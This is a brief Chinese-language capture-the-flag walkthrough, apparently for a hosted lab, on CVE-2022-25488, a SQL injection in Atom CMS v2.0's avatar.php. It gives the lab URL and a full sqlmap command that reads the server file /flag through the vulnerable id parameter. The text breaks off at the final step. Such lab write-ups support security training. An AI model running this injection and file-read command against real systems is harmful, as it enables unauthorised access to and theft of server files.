CVE-2022-25488
一、漏洞介绍
Atom CMS v2.0存在sql注入漏洞在/admin/ajax/avatar.php页面
二、渗透步骤
1、打开网站
http://eci-2zeiglmgxyblyk2g4y5c.cloudeci1.ichunqiu.com/home
2、SQL注入
http://eci-2zeiglmgxyblyk2g4y5c.cloudeci1.ichunqiu.com/admin/ajax/avatar.php?id=1
┌──(kali㉿kali)-[~]
└─$ sqlmap -u "http://eci-2zeiglmgxyblyk2g4y5c.cloudeci1.ichunqiu.com/admin/ajax/avatar.php?id=1" --file-read "/flag" --dbms mysql --batch
3、查看flag值
┌──